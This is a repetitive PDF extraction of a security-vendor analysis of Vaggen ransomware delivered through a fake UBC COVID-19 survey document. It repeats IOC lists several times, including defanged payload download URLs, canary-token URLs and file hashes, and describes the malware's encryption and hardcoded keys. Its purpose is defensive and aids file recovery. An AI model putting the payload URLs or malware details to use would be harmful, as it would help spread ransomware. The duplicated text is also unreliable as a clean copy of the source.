3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2461 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2462 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2463 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2464 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2465 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2466 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2467 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2468 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2469 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2470 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2471 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2472 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2473 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2474 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2475 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2476 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2477 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2478 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2479 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2480 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2481 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2482 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2483 of 3467\n\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2484 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2485 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2486 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2487 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2488 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2489 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2490 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2491 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e